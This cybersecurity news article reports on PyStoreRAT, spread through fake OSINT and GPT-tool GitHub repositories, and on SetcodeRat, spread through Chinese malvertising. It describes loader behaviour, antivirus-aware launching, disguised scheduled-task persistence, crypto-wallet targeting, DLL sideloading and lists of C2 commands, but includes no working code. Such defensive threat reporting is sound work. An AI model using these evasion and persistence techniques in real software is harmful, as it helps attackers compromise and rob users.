PyStoreRAT Malware Payloads Are Spread via Fake OSINT and GPT Utility GitHub Repos -

Post Views: 52

“Recently, a spike in malware spread has come into the spotlight involving OSINT and GPT Utility.”

Cybersecurity experts PyStoreRAT Malware are drawing attention to a new campaign that uses Python repositories hosted on GitHub to spread PyStoreRAT, a JavaScript-based Remote Access Trojan (RAT) that was not previously described.

Yonatan Edri, Morphisec, Researcher, Report

“These repositories, which are sometimes marketed as OSINT tools or development utilities, only have a few lines of code that discreetly download and run a remote HTA file using ‘mshta.exe.”

Although the identity of the operation’s perpetrator is still unknown, the existence of Russian-language evidence and coding patterns suggests a threat actor with Eastern European ancestry.

“A move toward modular, script-based implants that may deliver various payload forms and adjust to security measures is represented by PyStoreRAT.”

“It establishes a covert first-stage foothold that conventional EDR solutions only identify later in the infection chain thanks to its use of HTA/JS for execution, Python loaders for distribution, and Falcon-aware evasion logic.”

ExE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules can all be executed by PyStoreRAT, which is referred to as a “modular, multi-stage” implant. As a follow-on payload, the malware also uses Rhadamanthys, an information stealer.

Attack chains use Python or JavaScript loader stubs embedded in GitHub repositories to disseminate the malware under the guise of OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are intended to attract developers and analysts.

Mid-June 2025 saw the first indications of the campaign, and since then, a constant flow of “repositories” has been released. In addition to falsely inflating the repositories’ star and fork metrics, a tactic reminiscent of the Stargazers Ghost Network, the tools are advertised on social media sites like YouTube and X.

After the tools started to gain popularity and appeared on GitHub’s top trending lists, the threat actors behind the campaign used either recently created GitHub accounts or accounts that had been dormant for months to publish the repositories. In October and November, they surreptitiously slipped the malicious payload in the form of “maintenance” commits.

In actuality, several of the tools did not perform as promised; in many instances, they just displayed static menus or non-interactive interfaces, while in others, they only carried out rudimentary placeholder functions.

By leveraging GitHub’s inherent trust and tricking users into running the loader stub that starts the infection chain, the operation aimed to give them a false sense of legitimacy.

The PyStoreRAT malware, which has the ability to profile the system, check for administrator privileges, and search the system for files related to cryptocurrency wallets, particularly those connected to Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02, is delivered by a remote HTML Application (HTA) payload that is effectively triggered by this.

Probably in an effort to lower visibility, the loader stub compiles a list of installed antivirus programs and looks for strings that match “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs).

If they are found, “mshta.exe” is launched using “cmd.exe.” If not, “mshta.exe” is executed directly.

Setting up a scheduled process that poses as an NVIDIA app self-update is how persistence is accomplished. In the last phase, the virus makes contact with an outside server to obtain commands to be run on the host. The following is a list of some of the supported commands:

Download and run Rhadamanthys and other EXE payloads.
ZIP files can be downloaded and extracted.
Uses “rundll32.exe” to launch a malicious DLL that has been downloaded.
Get the raw JavaScript code and use eval() to run it dynamically in memory.
Install MSI packages after downloading them.
To load more remote HTA payloads, launch a second “mshta.exe” process.
Run PowerShell instructions straight from memory.
Propagated through portable disks by substituting malicious Windows Shortcut (LNK) files for authentic documents.
To get rid of the forensic trail, delete the scheduled task.

The revelation coincides with the description of a new remote access trojan (RAT) called SetcodeRat by Chinese security firm QiAnXin, which is probably spreading throughout the nation since October 2025 through malvertising lures.

In just one month, hundreds of computers, including those owned by businesses and governments, are reportedly infected.

QiAnXin, Threat Intelligence Center

“Initially, the malicious installation program would confirm the victim’s location.”

“It will automatically leave if it is not in the Chinese-speaking area.”

Only when the system language matches Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW) will the malware advance to the next step while posing as genuine installers for well-known applications like Google Chrome. Additionally, if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) fails, it ends the operation.

The following step involves launching a program called “pnm2png.exe” to sideload “zlib1.dll,” which subsequently decrypts and executes the contents of a file called “qt.conf”. The RAT payload is embedded in a DLL that is the decrypted payload.

SetcodeRat can retrieve instructions and steal data by connecting to a traditional command-and-control (C2) server or Telegram.

It gives the malware the ability to run “cmd.exe,” take screenshots, log keystrokes, read and set directories, start processes, set socket connections, gather system and network connection data, and update itself to a new version.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”

Jaguar Land Rover Faced a Major Cyber Attack Claiming Payroll Data Theft